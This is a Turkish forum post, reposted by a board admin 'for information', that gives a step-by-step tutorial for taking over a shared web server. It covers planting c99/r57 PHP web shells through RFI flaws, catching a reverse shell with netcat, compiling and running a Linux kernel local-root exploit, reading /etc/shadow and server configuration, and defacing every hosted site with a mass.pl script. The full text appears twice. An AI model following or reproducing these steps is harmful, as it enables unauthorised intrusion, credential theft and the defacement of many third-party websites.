[İstihbarat] Server Hack [Detaylı Anlatım]

**OguzHan** · 15-09-11, 19:59

Neler yapıldığı hakkında fikrimiz olsun..
Türkçe düzeyi düşük bu metni bilgilenme amaçlı olarak alıntılıyorum..
Ana dilini bile layıkıyla kullanmayı beceremeyenler bu işlerle zihinsel masturbasyon yapıp tatmin oluyorlar..

.................................................. .................................................. .................................................. ............

herkes shell ile web sitesi hackliyor artık hemen hemen bütün basit sitelerde RFI denilen
açıklardan var. peki bu basit portal sitelerinden yola çıkarak neler yapılır dersiniz.?

herhangi bri web sitene yedirmiş oldugumuz shell(c99 r57 bypass vs vs.) ile bütün SERVERı
ele geçirmek mümkün.

®BUNU UYGULAMALI YAPALIM®

ÖN HAZIRLIK:

öncelikle yedirmiş oldugumuz shell üzerinden yola çıkarak server elegeçiriyoruz.

öncelikle bir siteye c99 baglandı isek bu siteye index atmadan önce r57 txt de açıp
kaydederken .php diye kaydediyoruz bilgisayarımıza.

daha sonra c99 banladıgımız siteye upload bölümünde r57.php upload ediyoruz. upload
ettigimiz r57.php açıyoruz.

burası bir kenarda dursun işimdi diyer hazırlıkları yapalım:

modemimizde port açmamız gerekecek şimdi modem ayarlarından herhan gibir (6589)
port açıyor.

netcat denen ufak bir programı nidiriyoruz ve pcmizde system32 açıyoruz.

®HAZIRLIK TAMAM UYGULAMAYA GEÇİYORUZ®

şimdi ön hazırlıkları tamamladık

yukarda r57.php upload ettigimiz siteye gidip upload edilin l ink üzerinden r57
çalıştıroyoruz.

daha sonra başlat/çalıştır/cmd

diyiyoruz karşımıza glen ekranda nc -vv -l port no yazıyoruz ve karşımza listening any
6589... diye bri yazı gelecek bunu oldugu gibi bırakıyoruz ve tekrar hedef siteye
dönüyoruz.

r57.php baglanılmış siteni el altında back connect seçenegi var ordaki port yazılı olan
yeri silip biraz önce netcat ile verdgimizi komuttaki potu yazıyoruz ve connect diyoruz.

biraz bekledikten sonra yukarda verdigimiz listening any 6589... altında connect to
10.0.0.2 server.hedefsite.com ve server sürümü karşımza geliyor. evet artık server girdik
artık bütün serverda istedigimiz yapacagız.

PEKİ NASIL :

şimdi yukardaki yazıda server sürümü atıyorum linux 2.6.14 olsun

herhangi bir exploit sitesinden bu exploit bulup bilisayarımıza (isim).c diye
kaydediyoruz. burdaki eexploit adımız root olsun.

daha sonra siteye r57.php upload eder gibi root.c upload ediyoruz.

yine ms dos ekranımıza dönüp ls yazıp enter diyoruz. ve karşımza exploit yazılı oldugu
bbölge geliyor örnegin (linux2.6.14.c) devam ediyoruz

gcc -o root root.c diyoruz.DİKKAT BİRİNCİ YAZDIGIMIZ SONUNDA .C YOK.
ls tekrar yazdımızda busefer karşımıza alt alta iki tane root yazsısı geliyor. birinci root.c
ikinsi ise root
bu demek oluyorki exploit derlendi kullanıma hazır.

chmod 777 root diyoruz. (bunu dememizdeki amaç serverda exploit tam yetki
saglamak)

./root deyip exploit çalıştırıyoruz. ve beklemeye koyuluyoruz.

biraz bekledikten sonra uid-0(root) gid-0(root)... yazılar gelecek. EVET ARTIK SERVER
LOCAL OLARAK BAGLANDIK VE SİSTEMİ TAMAMEN ELE GEÇİRDİK

ŞİMDİ BAKALIM BU SEVERDA KAÇ TANE DOMAİN VAR.

domainlere bakacagımız dinler

/etc/httpd/conf/httpd.conf

/var/cpanel

etc/shadow
/var/named

bu dizinlerden cd/etc/httpd/conf/httpd.conf geçiyoruz(yukardakdizinlerden başkarına
geçiş yapabilirsiniz illa bu dizinde oalcak diye brişey yok)

ls ve serverdaki main listesine ulaşıyoruz.

EVET ARTIK BÜTÜN SERVER İNDEX ATALIMMI

DEVAM EDİYORUZ

şimdi bize buiş için gerekli olan mass.pl adında bir perl exploit bu exploit de yukarda
r57.php upload ettigmiz dizine upload ediyoruz.

r57ekranın en üstündeki pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar)

yine msdos da kaldıgımız yerde

cd pwp deki uzantıyı yazıp enter diyoruz

perl mass.pl yazıp enter deyip çalıştıriyoruz. exploit baglanırken önceden hazırlamış
oldugumuz index i en başta r57.php upload ettgiimiz yerede index.html şeklinde upload
ediyoruz.

upload işlemi bittikten sorna

ms dosa kaldımız yere

perl mass.pl pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar)

enter diyoruz ve artık bütün siteye index atmış olduk.

.................................................. .........................................

15-09-11, 19:59	#1
OguzHan Co Admin Üyelik tarihi: 23-06-11 Mesajlar: 2,824 Tecrübe Puanı: 15178	[İstihbarat] Server Hack [Detaylı Anlatım] Neler yapıldığı hakkında fikrimiz olsun.. Türkçe düzeyi düşük bu metni bilgilenme amaçlı olarak alıntılıyorum.. Ana dilini bile layıkıyla kullanmayı beceremeyenler bu işlerle zihinsel masturbasyon yapıp tatmin oluyorlar.. .................................................. .................................................. .................................................. ............ herkes shell ile web sitesi hackliyor artık hemen hemen bütün basit sitelerde RFI denilen açıklardan var. peki bu basit portal sitelerinden yola çıkarak neler yapılır dersiniz.? herhangi bri web sitene yedirmiş oldugumuz shell(c99 r57 bypass vs vs.) ile bütün SERVERı ele geçirmek mümkün. ®BUNU UYGULAMALI YAPALIM® ÖN HAZIRLIK: öncelikle yedirmiş oldugumuz shell üzerinden yola çıkarak server elegeçiriyoruz. öncelikle bir siteye c99 baglandı isek bu siteye index atmadan önce r57 txt de açıp kaydederken .php diye kaydediyoruz bilgisayarımıza. daha sonra c99 banladıgımız siteye upload bölümünde r57.php upload ediyoruz. upload ettigimiz r57.php açıyoruz. burası bir kenarda dursun işimdi diyer hazırlıkları yapalım: modemimizde port açmamız gerekecek şimdi modem ayarlarından herhan gibir (6589) port açıyor. netcat denen ufak bir programı nidiriyoruz ve pcmizde system32 açıyoruz. ®HAZIRLIK TAMAM UYGULAMAYA GEÇİYORUZ® şimdi ön hazırlıkları tamamladık yukarda r57.php upload ettigimiz siteye gidip upload edilin l ink üzerinden r57 çalıştıroyoruz. daha sonra başlat/çalıştır/cmd diyiyoruz karşımıza glen ekranda nc -vv -l port no yazıyoruz ve karşımza listening any 6589... diye bri yazı gelecek bunu oldugu gibi bırakıyoruz ve tekrar hedef siteye dönüyoruz. r57.php baglanılmış siteni el altında back connect seçenegi var ordaki port yazılı olan yeri silip biraz önce netcat ile verdgimizi komuttaki potu yazıyoruz ve connect diyoruz. biraz bekledikten sonra yukarda verdigimiz listening any 6589... altında connect to 10.0.0.2 server.hedefsite.com ve server sürümü karşımza geliyor. evet artık server girdik artık bütün serverda istedigimiz yapacagız. PEKİ NASIL : şimdi yukardaki yazıda server sürümü atıyorum linux 2.6.14 olsun herhangi bir exploit sitesinden bu exploit bulup bilisayarımıza (isim).c diye kaydediyoruz. burdaki eexploit adımız root olsun. daha sonra siteye r57.php upload eder gibi root.c upload ediyoruz. yine ms dos ekranımıza dönüp ls yazıp enter diyoruz. ve karşımza exploit yazılı oldugu bbölge geliyor örnegin (linux2.6.14.c) devam ediyoruz gcc -o root root.c diyoruz.DİKKAT BİRİNCİ YAZDIGIMIZ SONUNDA .C YOK. ls tekrar yazdımızda busefer karşımıza alt alta iki tane root yazsısı geliyor. birinci root.c ikinsi ise root bu demek oluyorki exploit derlendi kullanıma hazır. chmod 777 root diyoruz. (bunu dememizdeki amaç serverda exploit tam yetki saglamak) ./root deyip exploit çalıştırıyoruz. ve beklemeye koyuluyoruz. biraz bekledikten sonra uid-0(root) gid-0(root)... yazılar gelecek. EVET ARTIK SERVER LOCAL OLARAK BAGLANDIK VE SİSTEMİ TAMAMEN ELE GEÇİRDİK ŞİMDİ BAKALIM BU SEVERDA KAÇ TANE DOMAİN VAR. domainlere bakacagımız dinler /etc/httpd/conf/httpd.conf /var/cpanel etc/shadow /var/named bu dizinlerden cd/etc/httpd/conf/httpd.conf geçiyoruz(yukardakdizinlerden başkarına geçiş yapabilirsiniz illa bu dizinde oalcak diye brişey yok) ls ve serverdaki main listesine ulaşıyoruz. EVET ARTIK BÜTÜN SERVER İNDEX ATALIMMI DEVAM EDİYORUZ şimdi bize buiş için gerekli olan mass.pl adında bir perl exploit bu exploit de yukarda r57.php upload ettigmiz dizine upload ediyoruz. r57ekranın en üstündeki pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar) yine msdos da kaldıgımız yerde cd pwp deki uzantıyı yazıp enter diyoruz perl mass.pl yazıp enter deyip çalıştıriyoruz. exploit baglanırken önceden hazırlamış oldugumuz index i en başta r57.php upload ettgiimiz yerede index.html şeklinde upload ediyoruz. upload işlemi bittikten sorna ms dosa kaldımız yere perl mass.pl pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar) enter diyoruz ve artık bütün siteye index atmış olduk. .................................................. ......................................... __________________ ~~~~~~~~~~~~~~~@~~~~~~~~~~~~~~~ “Akıl, Aşk ve Can; Bu Üçü Üçgendir. Her Derde Deva,. Her Yaraya Merhemdir." Hz.Mevlânâ Konu OguzHan tarafından (15-09-11 Saat 20:06 ) değiştirilmiştir..

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç